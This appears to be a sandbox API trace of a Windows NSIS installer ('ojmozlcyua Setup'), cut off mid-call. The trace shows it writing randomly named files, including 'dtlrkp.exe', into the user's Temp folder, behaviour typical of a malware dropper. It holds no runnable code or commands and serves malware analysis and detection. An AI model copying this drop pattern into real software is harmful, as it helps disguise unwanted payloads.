lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0135.990] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0135.990] lstrcpynW (in: lpString1=0x435800, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0135.990] LoadImageW (hInst=0x400000, name=0x67, type=0x1, cx=0, cy=0, fuLoad=0x8040) returned 0x601c9 [0135.994] wsprintfW (in: param_1=0x437000, param_2="%d" | out: param_1="1033") returned 4 [0135.994] lstrlenW (lpString="ojmozlcyua") returned 10 [0135.994] lstrcpynW (in: lpString1=0x429220, lpString2="ojmozlcyua Setup", iMaxLength=1024 | out: lpString1="ojmozlcyua Setup") returned="ojmozlcyua Setup" [0135.994] SetWindowTextW (hWnd=0x0, lpString="ojmozlcyua Setup") returned 0 [0135.994] lstrcpynW (in: lpString1=0x6632ac, lpString2="bptgtqrjvpq", iMaxLength=1024 | out: lpString1="bptgtqrjvpq") returned="bptgtqrjvpq" [0135.994] lstrcpynW (in: lpString1=0x663ac4, lpString2="mdtmlvddzpnx", iMaxLength=1024 | out: lpString1="mdtmlvddzpnx") returned="mdtmlvddzpnx" [0135.994] ShowWindow (hWnd=0x0, nCmdShow=5) returned 0 [0135.994] GetSystemDirectoryW (in: lpBuffer=0x19f914, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.994] wsprintfW (in: param_1=0x19f93a, param_2="%s%S.dll" | out: param_1="\\RichEd20.dll") returned 13 [0135.994] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\RichEd20.dll", hFile=0x0, dwFlags=0x8) returned 0x6c5e0000 [0136.724] GetClassInfoW (in: hInstance=0x0, lpClassName="RichEdit20W", lpWndClass=0x4291c0 | out: lpWndClass=0x4291c0) returned 1 [0136.726] DialogBoxParamW (hInstance=0x400000, lpTemplateName=0x69, hWndParent=0x0, lpDialogFunc=0x403f64, dwInitParam=0x0) returned 0x0 [0137.475] GetDlgItem (hDlg=0xb030e, nIDDlgItem=1) returned 0x3023c [0137.475] GetDlgItem (hDlg=0xb030e, nIDDlgItem=2) returned 0x50320 [0137.475] SetDlgItemTextW (hDlg=0xb030e, nIDDlgItem=1028, lpString="Nullsoft Install System v3.08") returned 1 [0137.475] SetClassLongW (hWnd=0xb030e, nIndex=-14, dwNewLong=393673) returned 0x0 [0137.479] lstrcpynW (in: lpString1=0x4281c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0137.479] lstrlenW (lpString="") returned 0 [0137.479] lstrcpynW (in: lpString1=0x40b5c8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0137.479] lstrcpynW (in: lpString1=0x40bdc8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0137.479] lstrcmpiW (lpString1="", lpString2="") returned 0 [0137.479] lstrcpynW (in: lpString1=0x4281c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0137.479] lstrlenW (lpString="") returned 0 [0137.480] lstrcpynW (in: lpString1=0x67b0fc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0137.480] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0137.480] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0137.480] lstrcpynW (in: lpString1=0x40adc8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0137.480] GetTickCount () returned 0xf92678 [0137.480] GetTempFileNameW (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpPrefixString="nsa", uUnique=0x0, lpTempFileName=0x42b000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsa2679.tmp")) returned 0x2679 [0137.483] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp" [0137.483] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned 48 [0137.483] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp" [0137.483] lstrcpynW (in: lpString1=0x425f10, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp" [0137.483] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned 48 [0137.483] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsa2679.tmp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf2968db, ftCreationTime.dwHighDateTime=0x1d86053, ftLastAccessTime.dwLowDateTime=0xbf2968db, ftLastAccessTime.dwHighDateTime=0x1d86053, ftLastWriteTime.dwLowDateTime=0xbf2968db, ftLastWriteTime.dwHighDateTime=0x1d86053, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nsa2679.tmp", cAlternateFileName="")) returned 0x64e2f0 [0137.483] FindClose (in: hFindFile=0x64e2f0 | out: hFindFile=0x64e2f0) returned 1 [0137.483] DeleteFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsa2679.tmp")) returned 1 [0137.484] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp" [0137.484] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned 48 [0137.484] lstrcpynW (in: lpString1=0x40adc8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp" [0137.484] CreateDirectoryW (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0137.484] GetLastError () returned 0xb7 [0137.484] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0137.484] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0137.485] GetLastError () returned 0xb7 [0137.485] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0137.485] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0137.485] GetLastError () returned 0xb7 [0137.485] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0137.485] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0137.485] GetLastError () returned 0xb7 [0137.485] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0137.485] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0137.485] GetLastError () returned 0xb7 [0137.485] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0137.486] GetModuleHandleA (lpModuleName="SHELL32") returned 0x741b0000 [0137.486] GetProcAddress (hModule=0x741b0000, lpProcName=0x2a8) returned 0x7445db90 [0137.486] IsUserAnAdmin () returned 1 [0137.486] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsa2679.tmp"), lpSecurityAttributes=0x19f0d8) returned 1 [0137.487] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp" [0137.487] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned 48 [0137.487] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp" [0137.487] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned 48 [0137.487] lstrcpynW (in: lpString1=0x438000, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp" [0137.487] lstrcpynW (in: lpString1=0x42b000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0137.488] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0137.488] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0137.488] lstrcpynW (in: lpString1=0x40adc8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0137.488] CreateDirectoryW (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0137.488] GetLastError () returned 0xb7 [0137.488] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0137.488] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0137.489] GetLastError () returned 0xb7 [0137.489] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0137.489] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0137.489] GetLastError () returned 0xb7 [0137.489] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0137.489] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0137.489] GetLastError () returned 0xb7 [0137.489] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0137.489] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0137.489] GetLastError () returned 0xb7 [0137.489] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0137.489] lstrcpynW (in: lpString1=0x436000, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0137.489] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 1 [0137.490] lstrcpynW (in: lpString1=0x40bdc8, lpString2="q3e3yvw7kwoie", iMaxLength=1024 | out: lpString1="q3e3yvw7kwoie") returned="q3e3yvw7kwoie" [0137.490] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0137.490] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0137.490] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0137.490] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="q3e3yvw7kwoie" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\q3e3yvw7kwoie") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\q3e3yvw7kwoie" [0137.490] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\q3e3yvw7kwoie" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\q3e3yvw7kwoie")) returned 0xffffffff [0137.490] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\q3e3yvw7kwoie" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\q3e3yvw7kwoie")) returned 0xffffffff [0137.490] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\q3e3yvw7kwoie" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\q3e3yvw7kwoie"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0137.491] SetFilePointer (in: hFile=0x210, lDistanceToMove=38512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9670 [0137.491] ReadFile (in: hFile=0x210, lpBuffer=0x19f3f0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x19f3f0*, lpNumberOfBytesRead=0x19f330*=0x4, lpOverlapped=0x0) returned 1 [0137.491] GetTickCount () returned 0xf92688 [0137.491] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0137.632] GetTickCount () returned 0xf92714 [0137.632] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x4387, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x4387, lpOverlapped=0x0) returned 1 [0137.635] GetTickCount () returned 0xf92714 [0137.635] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0137.641] GetTickCount () returned 0xf92714 [0137.641] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x4234, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x4234, lpOverlapped=0x0) returned 1 [0137.642] GetTickCount () returned 0xf92724 [0137.642] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0137.645] GetTickCount () returned 0xf92724 [0137.645] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x4991, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x4991, lpOverlapped=0x0) returned 1 [0137.645] GetTickCount () returned 0xf92724 [0137.645] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0137.647] GetTickCount () returned 0xf92724 [0137.647] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x4813, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x4813, lpOverlapped=0x0) returned 1 [0137.648] GetTickCount () returned 0xf92724 [0137.648] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0137.651] GetTickCount () returned 0xf92724 [0137.651] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x5f77, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x5f77, lpOverlapped=0x0) returned 1 [0137.652] GetTickCount () returned 0xf92724 [0137.652] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x624, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x624, lpOverlapped=0x0) returned 1 [0137.652] GetTickCount () returned 0xf92724 [0137.652] MulDiv (nNumber=83492, nNumerator=100, nDenominator=83492) returned 100 [0137.653] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0137.653] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x2929, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x2929, lpOverlapped=0x0) returned 1 [0137.653] GetTickCount () returned 0xf92724 [0137.653] MulDiv (nNumber=83492, nNumerator=100, nDenominator=83492) returned 100 [0137.653] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0137.653] SetFileTime (hFile=0x28, lpCreationTime=0x19f6b8, lpLastAccessTime=0x0, lpLastWriteTime=0x19f6b8) returned 1 [0137.653] CloseHandle (hObject=0x28) returned 1 [0137.658] lstrcpynW (in: lpString1=0x40bdc8, lpString2="hzuplybmb", iMaxLength=1024 | out: lpString1="hzuplybmb") returned="hzuplybmb" [0137.658] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0137.658] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0137.658] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0137.658] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="hzuplybmb" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb" [0137.658] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\hzuplybmb")) returned 0xffffffff [0137.658] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\hzuplybmb")) returned 0xffffffff [0137.658] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\hzuplybmb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0137.659] SetFilePointer (in: hFile=0x210, lDistanceToMove=122008, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1dc98 [0137.659] ReadFile (in: hFile=0x210, lpBuffer=0x19f3f0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x19f3f0*, lpNumberOfBytesRead=0x19f330*=0x4, lpOverlapped=0x0) returned 1 [0137.659] GetTickCount () returned 0xf92734 [0137.659] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0xa7f, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0xa7f, lpOverlapped=0x0) returned 1 [0137.795] GetTickCount () returned 0xf927b1 [0137.795] MulDiv (nNumber=2687, nNumerator=100, nDenominator=2687) returned 100 [0137.795] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0137.795] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x144a, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x144a, lpOverlapped=0x0) returned 1 [0137.797] GetTickCount () returned 0xf927b1 [0137.797] MulDiv (nNumber=2687, nNumerator=100, nDenominator=2687) returned 100 [0137.797] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0137.797] SetFileTime (hFile=0x28, lpCreationTime=0x19f6b8, lpLastAccessTime=0x0, lpLastWriteTime=0x19f6b8) returned 1 [0137.797] CloseHandle (hObject=0x28) returned 1 [0137.799] lstrcpynW (in: lpString1=0x40bdc8, lpString2="dtlrkp.exe", iMaxLength=1024 | out: lpString1="dtlrkp.exe") returned="dtlrkp.exe" [0137.799] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0137.799] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0137.799] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0137.799] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="dtlrkp.exe" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe" [0137.799] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dtlrkp.exe")) returned 0xffffffff [0137.799] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dtlrkp.exe")) returned 0xffffffff [0137.800] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dtlrkp.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0137.800] SetFilePointer (in: hFile=0x210, lDistanceToMove=124699, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e71b [0137.800] ReadFile (in: hFile=0x210, lpBuffer=0x19f3f0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x19f3f0*, lpNumberOfBytesRead=0x19f330*=0x4, lpOverlapped=0x0) returned 1 [0137.800] GetTickCount () returned 0xf927c0 [0137.800] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x889, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x889, lpOverlapped=0x0) returned 1 [0137.898] GetTickCount () returned 0xf9281e [0137.899] MulDiv (nNumber=2185, nNumerator=100, nDenominator=2185) returned 100 [0137.899] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0137.899] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x1600, lpOverlapped=0x0) returned 1 [0137.900] GetTickCount () returned 0xf9281e [0137.900] MulDiv (nNumber=2185, nNumerator=100, nDenominator=2185) returned 100 [0137.900] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0137.900] SetFileTime (hFile=0x28, lpCreationTime=0x19f6b8, lpLastAccessTime=0x0, 